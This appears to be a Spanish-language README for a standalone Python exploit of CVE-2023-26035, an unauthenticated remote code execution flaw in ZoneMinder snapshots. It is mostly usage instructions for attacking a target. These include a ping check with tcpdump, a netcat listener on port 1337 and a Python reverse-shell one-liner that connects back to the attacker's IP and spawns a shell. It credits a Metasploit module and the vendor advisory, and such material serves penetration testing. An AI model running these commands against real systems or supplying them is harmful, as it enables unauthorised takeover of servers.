
Exploit para CVE-2023-26035 que afecta a ZoneMinder < 1.36.33 y < 1.37.33
Hay una Ejecución Remota de Código (RCE) sin autenticación que afecta a las instantáneas de ZoneMinder.
Esto es un exploit para CVE-2023-26035.
ZoneMinder < 1.36.33 y
ZoneMinder < 1.37.33.

python3 zoneminder.py http://target
python3 zoneminder.py http://target command
pingEjecuta tcpdump en la interfaz conectada al objetivo (aquí tun0) y filtra por paquetes ICMP:
sudo tcpdump -i tun0 icmp
Luego ejecuta un ping a tu IP. Asegúrate de usar comillas " ya que de lo contrario el comando no se interpretará correctamente.
python3 zoneminder.py http://target "ping -C 4 your_ip"
Crea el listener con netcat:
nc -lvnp 1337
Usa un oneliner de reverse shell:
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
Más en https://revshells.com.
El exploit hace uso de requests y BeautifulSoup.
Instálalos con:
python3 -m pip install requests beautifulsoup4
Solo quería un exploit independiente que no requiriera Metasploit.
El script está derivado de https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr